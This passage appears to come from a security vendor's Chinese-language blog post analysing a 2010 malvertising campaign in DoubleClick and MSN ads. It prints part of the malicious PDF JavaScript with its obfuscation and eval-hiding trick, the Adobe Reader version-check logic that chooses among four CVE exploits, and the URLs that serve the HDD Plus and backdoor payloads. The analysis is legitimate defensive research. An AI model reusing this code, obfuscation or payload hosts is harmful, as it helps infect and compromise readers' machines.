YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYY(YYYsYYYvYYY=YYY=YYY6YYY)YYYYYYYYY(YYYsYYYvYYY=YYY=YYY7YYY)YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY7YYY.YYY1YYY1YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYYlYYYvYYY YYY>YYY=YYY YYY9YYY.YYY1YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY9YYY.YYY2YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY>YYY=YYY YYY8YYY.YYY1YYY3YYY)YYY YYYYYYYYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY8YYY.YYY1YYY7YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\n';th("var oesfeufxntyi = cwyuvaooeo.re"+"pla"+"ce(/[Y]/g,'');");/* avqjavi766743 = 60; <owzeuouz106118> */var ugyolugwu968354 = "_e75af8ac39f";/* vuyiua152184 = 76; <zriefda431629> */var iuoeonh343430 = "_21d716ac020";var evaiwueei264011 = "_7ed30974517";/* rlaoaya455073 = 95; <geaaoo654855> */var iuzxgj474859 = "_3046be797c0";var pewzyahmfb544339 = "_8bdfb70b60f";/* seiiaue71607 = 39; <unzoe856710> *//* yuydi485926 = 1; <dkykz871039> */var pgsinuunf = 100;/* hucrbdit453671 = 76; <nyyrrazqy740615> *//* namdkey949757 = 64; <yzdee833418> */var vuveioae876679 = "_0328e8fa935";/* iuoytl56881 = 46; <oiowiea705586> *//* ntpadaq590040 = 38; <ovkcjaka633301> */var gpyousxo = '';/* auomgyoed16943 = 82; <mumaa309375> */var xaeuhifje753328 = "_16533722a29";/* kmuiuayg202152 = 98; <asuuhlhy426995> *//* upcowvqa721683 = 3; <aydaeauo365685> */sauavlepu0 = oesfeufxntyi;var ayuyg642660 = "_15f35fef3a2";/* uedaeig772200 = 27; <oucyueo443122> *//* uyqota442513 = 52; <iyxuoa210597> *//* eyaye796590 = 43; <iaooywuv348521> */for(alookaaraaio=0;alookaaraaio<pgsinuunf;alookaaraaio++) {var vauiauyyfcfi = 'function a1106889858(fa) {return fa;} var a266415535 = 281772104;function a454936894(fa) {return fa;} var a289990746 = 1206395987;function a606709841(fa) {return fa;} var a814629542 = 809599932;function a975519308(fa) {return fa;} var a73837795 = 418139819;function a1311395772(fa) {return fa;} var a102714415 = 1168743178;function a457025328(fa) {return fa;} var a106369175 = 824445897;';var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var dsfsg = alookaaraaio+1;gpyousxo = 'var sauavlepu'+dsfsg+'=sauavlepu'+alookaaraaio+';'+vauiauyyfcfi+''+vauiauyyfcfi+''+vauiauyyfcfi+'';th(gpyousxo);}th(sauavlepu100);var okyyyornb516688 = "_3ffdcb9f05e";var pquxtoa762840 = "_68a883464be";/* yryeie384069 = 97; <aeyoboeaa202244> */
//</ACRO_script>
//</Document-Actions>
這段混碼的手法算蠻老練的,很顯然的花了不少手工在上面,而這個javascript程式碼是用ASCII85來做混碼的。
首先這個解混碼的函數為:
function ghfsdj(adbhsdh)
{
var jfsd = "gas%ss2u";
return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
下面這段shellcode的片段就是利用這個函數來解混碼:
shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC..");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589..");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CA..");
解混碼函數會將&&置換成%u。然後用為了躲避pattern-based的偵測(如AntiVirus),它用了一個有趣的戲法就是將eval()這個函數拆解,試圖來隱藏它:
var ev = 'yeegsgvsssaglh';
..
this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');
被解碼出來的javascript包含了許多不同漏洞的exploit code如下所示:
a) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ((CVE-2009-4324))
b) Adobe Acrobat and Reader util.printf (CVE-2008-2992)
c) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
d) Adobe Reader GetMailInfo (CVE-2007-5659)
而下面的這段javascript是用的比對主機是否含有對應漏洞的Adobe Reader版本,一旦發現就觸發對應的Exploit code:
aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
{
if (aPlugins[i].name=="EScript")
{
var lv=aPlugins[i].version;
}
}
if ((lv==9)((sv==8)&&(lv<=8.12)))
{
geticon();
}
else if (lv==7.1)
{
printf();
}
else if (((sv==6)(sv==7))&&(lv<7.11))
{
collab();
}
else if ((lv >= 9.1) (lv <= 9.2) (lv >= 8.13) (lv <= 8.17))
{
nplayer();
}
最初,防毒軟體針對這個惡意PDF的偵測率實在相當低--在VirusTotal上42家掃毒,只有2家掃到。之後是有好一點,但掃到的還是不多。
在成功打到漏洞後,會來執行shellcode,然後下載以下執行檔並運行它們:
1. file.exe (HDD Plus), from: http://colemuns.com/pupseg/forum.php?f=MDAC&key=92e93d0553cdb3c89d7d397457811f6d&u=root, Virus Total的掃瞄結果。
2. 461-direct.exe (backdoor), from: http://searchjewel.org/any5/461-direct.exe, Virus Total的掃瞄結果。
註: 這些執行檔在過去幾天都持續的換來換去的(不見得就是上面所列的)。
其它所安裝的惡意程式,為一個名叫Kazy惡意程式的downloader,這邊是VirusTotal的報告請看這邊.
第二部份--rad.msn.com個案研究
一開始這個ADShufffle的惡意廣告先在rad.msn.com進行散播,然後是DoubleClick。然而它的行為是十分相像的。
在瀏覽一個含有rad.msn.com廣告的網站,例如mail.live.com、msnbc.com或realestate.msn.com這些網站
,瀏覽器中會看到來自rad.msn.com的一個大小為728x90廣告標籤:
<script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script>
這邊rad.msn.com也丟出了一些混碼的javascript,經過解碼後如下所示:
<script type="text/javascript" src="http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=23444436&lpd=${REQUESTID}&ASTPCT=${CLICKURL}"><script>
這邊瀏覽器因為同樣是載入adshufffle的惡意廣告,所以又再次看到實際大小為728x90的廣告。而它的內容是非法拷貝來的 http://media.topsann.com/bdb/aBigCommerce/728x90stat.gif:
之後的結果就跟上面的DoubleClick個案是類似的。
在阿碼科技從2000年開始開發偵測drive-by downloads的技術在2003年的WWW研討會(WWW 2003)上第一次正式公開發表,在2007年我們收購了X-Solve推出了drive-by download的偵測服務:HackAlert,在最近為了針對惡意廣告的偵測以及提供各大媒體產業的使用,我們推出了一個新版的HackAlert----HackAlert SafeImpression。
如果您對任何資料有興趣, 請email告訴我們: hackalert@armorize.com
相關報導
資安業者:惡意廣告透過DoubleClick及msn散布
文/陳曉莉 (編譯) 2010-12-13
http://www.ithome.com.tw/itadm/article.php?c=64998
Google, Microsoft ad networks briefly hit by with malware
Doubleclick and Hotmail sites caught serving malicious ads
by Robert McMillan
http://www.computerworld.com/s/article/9200899/Google_Microsoft_ad_networks_briefly_hit_by_with_malware
Google DoubleClick Caught Serving Malicious Ad
By Kim Zetter December 10, 2010 3:09 pm Categories: Cybersecurity
http://www.wired.com/threatlevel/2010/12/doubleclick/
Google’s DoubleClick and Microsoft’a adCenter Ad Networks Hit By Malicious Advertisements
http://www.ditii.com/2010/12/11/googles-doubleclick-and-microsofta-adcenter-ad-networks-hit-by-malicious-advertisements/
Researchers: Major Ad Networks Serving Malware
Posted by George Hulme, Dec 11, 2010 01:44 PM
http://www.informationweek.com/blog/main/archives/2010/12/researchers_maj.html;jsessionid=K3Y1VR1NKMI5ZQE1GHPCKH4ATMY32JVN
Google, Microsoft Ad Networks Under Malware Attacks
Robert McMillan (IDG News Service) 13 December, 2010 04:47
http://www.pcworld.idg.com.au/article/371038/google_microsoft_ad_networks_briefly_hit_by_malware/
Malware Found In Ads Served By DoubleClick
Posted by Frank Watson on December 11, 2010 11:05 AM
http://blog.searchenginewatch.com/101211-110542
Big Embarrassment For Google, Cyber Criminals Tricked Google In Serving Malware Ads
Posted: 11th December 2010 by admin in Google, Internet, Security
http://essayboard.com/2010/12/11/big-embarrassment-for-google-cyber-criminals-tricked-google-in-serving-malware-ads/
米Google、MSのアドネットワークで悪意ある広告の配信:サイトを閲覧するだけで感染のおそれ
2010年12月11日 15:16
http://www.zaikei.co.jp/article/20101211/63829.html
Doubleclick and MSN serve up malware
13 Dec 2010 08:23 by Nick Farrell in Rome posted in Security
http://www.techeye.net/security/doubleclick-and-msn-serve-up-malware#ixzz17yknuAcz
Infectados los Ads de Google y Microsoft!!!
diciembre 12, 2010
http://www.tknologyk.net/?p=2444
Two Major Ad Networks Found Serving Malware
Posted by samzenpus on Monday December 13, @12:06AM
http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware?from=rss
Major Ad Networks Found Serving Malicious Ads
December 12, 2010, 6:00PM by Dennis Fisher
https://threatpost.com/en_us/blogs/major-ad-networks-found-serving-malicious-ads-121210
Google DoubleClick Found Serving Malicious Ad
Brian Prince 2010-12-10
http://www.eweek.com/c/a/Security/Google-DoubleClick-Found-Serving-Malicious-Ad-685431/
Ad firms are offering HDD malware
By David Neal
Mon Dec 13 2010, 14:30
http://www.theinquirer.net/inquirer/news/1932033/firms-offering-hdd-malware
1 篇回應 :
請問中了HDD PLUS怎麼解決??
張貼留言